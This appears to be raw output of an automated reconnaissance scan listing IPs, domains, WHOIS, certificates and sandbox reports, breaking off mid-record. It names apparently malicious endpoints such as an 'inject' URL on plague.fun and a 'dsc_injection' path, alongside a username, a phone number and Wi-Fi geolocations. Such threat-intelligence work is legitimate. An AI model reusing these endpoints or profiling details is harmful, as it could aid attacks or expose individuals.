None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b2bb53bf092c54-ORD 188.114.96.1 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None movil.pacificow.repl.co 34.149.204.188 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:00:21:01) 37.780462,-122.390564 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None Reddit (Category: social) https://www.reddit.com/user/rasputain rasputain 2022-12-18 00:15:36 HTTP Status Code No Web Spider 0 0 2 0 None None https://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection 2022-12-18 00:07:17 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=UTF-8 http://misogyny.wtf:2020/parser 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.178 34.149.204.188 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None daviseguridad.wwwcomm.repl.co 34.149.204.188 2022-12-18 00:26:05 Physical Location No MetaDefender 0 0 2 0 None San Jose, United States 104.21.19.243 2022-12-18 00:08:15 Netblock Membership No RIPE 1 0 1 0 None 51.103.0.0/16 51.103.210.236 2022-12-18 00:18:19 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.7:8080 188.114.97.0/24 2022-12-18 00:07:18 HTTP Status Code No Web Spider 0 0 3 0 None 404 http://misogyny.wtf/parser 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 172.67.147.230 2022-12-18 00:20:56 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2699e2c678114-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3031::ac43:93e6 2022-12-18 00:11:27 Raw Data from RIRs No GLEIF 0 0 3 0 None [{u'attributes': {u'highlighting': u'C/O CENTRALNIC LTD', u'value': u'C/O CENTRALNIC LTD'}, u'type': u'autocompletions'}] (c) CentralNic Ltd 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad78074edf230b-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:12:05 Country No Country Name Extractor 0 0 5 0 None Italy Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-05-22T07:28:29Z Creation Date: 2003-05-21T18:09:42Z Registry Expiry Date: 2023-05-21T18:09:42Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: ok https://icann.org/epp#ok Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-06-23T00:00:00Z Creation Date: 2011-01-25T00:00:00Z Registrar Registration Expiration Date: 2023-05-21T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:11:00Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:8880 188.114.97.1 2022-12-18 00:32:33 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.154:53 195.110.124.0/24 2022-12-18 00:04:12 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.1 2022-12-18 00:02:52 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:1f:4b:91:5b:d7:bf:2f:be:6e:27:8c:6c:60:f6:86:80 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: May 6 17:46:04 2022 GMT Not After : Aug 4 17:46:03 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e7:c5:36:be:0c:28:37:d1:29:a1:d8:b4:65:57: 4a:67:4b:70:6f:de:ee:84:da:2e:65:a4:e6:b3:94: fc:d9:d6:02:89:2f:df:90:93:c2:8f:aa:c6:52:e4: e9:73:db:4f:c5:3b:ef:34:a6:e0:3b:5d:da:48:b4: 48:c5:11:62:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: B1:C6:F3:C6:E5:48:6A:06:D6:8D:F2:AC:17:DA:BF:36:3F:CE:47:47 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : May 6 18:46:04.131 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:23:C5:C7:DA:43:E1:C7:33:EC:22:06: 46:DB:FD:FD:6E:26:73:6A:42:93:5E:C8:48:8D:94:08: 6A:63:AE:77:02:21:00:D6:CF:1B:D9:F4:BE:72:8F:70: 75:12:34:0F:98:8E:AA:B3:70:0F:52:86:45:C8:38:29: 92:51:17:15:B4:60:9D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : May 6 18:46:04.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:5F:DD:20:15:61:43:DF:28:01:F1:5E:3A: C3:BF:CE:49:95:FF:9D:AE:08:6F:25:34:45:2D:16:74: 18:DC:13:62:02:20:34:0B:4C:12:AB:EC:60:49:0F:FF: 04:29:D3:45:68:78:3C:53:F7:3B:DB:3A:7A:B9:46:20: D8:BF:54:89:19:52 Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:8e:55:f4:4b:0b:ea:74:eb:af:1b:31:ca:b4: 2a:f1:bc:38:eb:cd:b1:48:26:0d:4a:05:25:d6:55:33:8b:2c: 28:82:d7:7f:f8:62:b8:02:0b:3d:6c:71:af:b2:08:1b:b2:02: 30:75:2c:e8:ea:b0:91:09:c9:a7:bb:57:4c:be:70:65:3b:e4: 37:15:35:ef:f2:2c:d0:1d:71:bf:99:f3:16:f5:53:23:cc:07: 1a:c8:33:71:82:63:73:c3:18:2c:1b:ac:94 plague.fun 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf:2020/parser 20.226.83.185 2022-12-18 00:33:16 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.226] https://www.virustotal.com/en/ip-address/81.88.52.226/information/ 81.88.52.226 2022-12-18 00:08:56 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.0 2022-12-18 00:08:29 Netblock Membership No RIPE 1 0 2 0 None 172.67.128.0/20 172.67.137.37 2022-12-18 00:12:17 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://188.114.96.3:2052/j.ad', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ae4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ae4_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ae4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2788"\n "IsoScope_ae4_IESQMMUTEX_0_331"\n "IsoScope_ae4_ConnHashTable<2788>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ae4_IE_EarlyTabStart_0x354_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2788"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"performance.radar.cloudflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.3:2052"\n "104.18.30.78:443"\n "96.6.31.32:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "PP3WFJCT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PP3WFJCT.txt]- [targetUID: 00000000-00002788]\n Dropped file: "BJZ8QG4I.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BJZ8QG4I.txt]- [targetUID: 00000000-00002788]\n Dropped file: "13L0SVE5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\13L0SVE5.txt]- [targetUID: 00000000-00002160]\n Dropped file: "RT5RC69N.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RT5RC69N.txt]- [targetUID: 00000000-00002788]\n Dropped file: "L3TW5CW2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L3TW5CW2.txt]- [targetUID: 00000000-00002788]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002160]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002788]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "PP3WFJCT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PP3WFJCT.txt]- [targetUID: 00000000-00002788]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002788]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00002788]\n "BJZ8QG4I.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BJZ8QG4I.txt]- [targetUID: 00000000-00002788]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002788]\n "~DF2EA3D3EAFAB86FB1.TMP" has type "data"- Location: [%TEMP%\\~DF2EA3D3EAFAB86FB1.TMP]- [targetUID: 00000000-00002788]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002788]\n "13L0SVE5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\13L0SVE5.txt]- [targetUID: 00000000-00002160]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002788]\n "RT5RC69N.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RT5RC69N.txt]- [targetUID: 00000000-00002788]\n "_53C73EEB-4E08-11ED-9885-0800275E0C83_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFE327000172903087.TMP" has type "data"- Location: [%TEMP%\\~DFE327000172903087.TMP]- [targetUID: 00000000-00002788]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.3:2052/j.ad\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974\nX-Response-Cache-Status: True\nExpires: Mon, 17 Oct 2022 12:24:15 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Mon, 17 Oct 2022 12:24:15 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.3:2052/j.ad"\n Pattern match: "http://188.114.96.3"\n Heuristic match: "/j.ad"\n Heuristic match: "performance.radar.cloudflare.com"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"\n Heuristic match: "http_/n88_1496__l0Sl/j.ad"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.3" found in string "http://188.114.96.3:2052/j.ad"\n Potential IP "188.114.96.3" found in string "http://188.114.96.3"\n "188.114.96.3"\n Potential IP "188.114.96.3" found in string "GET /j.ad HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.3:2052\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name' 188.114.96.3 2022-12-18 00:09:31 Co-Hosted Site No HackerTarget 0 0 2 0 None calpehuturgaza.ml 104.21.28.240 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None herron-libson (Net ID: 00:01:24:F1:75:B2) 37.780462,-122.390564 2022-12-18 00:16:59 Web Content No Web Spider 0 0 4 0 None body { background: #eee none repeat scroll 0 0; } h1{ color: #888;} .navbar {display:none;} .main-content{background: none;} .company-logo{ text-align: center; margin-top: 30px; } .company-logo img{ border-radius: 5px; max-height: 100px; max-width: 250px; overflow: hidden; } .login { background: #fff none repeat scroll 0 0; border-radius: 5px; float: none; margin: 30px auto; padding: 30px 20px; -webkit-box-shadow: 0px 0px 75px -25px rgba(0,0,0,0.25); -moz-box-shadow: 0px 0px 75px -25px rgba(0,0,0,0.25); box-shadow: 0px 0px 75px -25px rgba(0,0,0,0.25); max-width: 400px; } .btn-group{display: block;} .form-header { background: #f9f9f9 none repeat scroll 0 0; border-radius: 3px 3px 0 0; margin: -30px -20px 30px; padding: 5px 0; } form#login{ margin: 40px 30px 0; } #submit{ margin: 50px 0 30px; } .footer { border-top: none; display: block; margin: 30px auto; padding: 0; text-align: center; } footer ul, footer li { list-style: outside none none; margin: 0; padding: 0; } footer ul li { border-right: 1px solid #ccc; display: inline; padding: 0 5px; } footer ul li:last-child { border-right: medium none; } footer .text { font-size: 12px; } @media (max-width: 767px) { .login{ } } http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ac9cee6f082931-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.137.37 2022-12-18 00:16:34 Physical Location No numverify 0 0 3 0 None Ponchatoul, US +19854014545 2022-12-18 00:22:07 Open TCP Port No Censys 0 0 2 0 None 34.149.204.188:443 34.149.204.188 2022-12-18 00:06:45 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.eu plague.fun 2022-12-18 00:16:26 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.96.3:443 188.114.96.3 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://wasp.plague.fun/inject/PDS1ays5XQVjXMk3 plague.fun 2022-12-18 00:06:13 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://uuuytttt89999.57f7f7cff7f7f.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/css/styles.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/css/styles.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/images/l.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/images/l.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 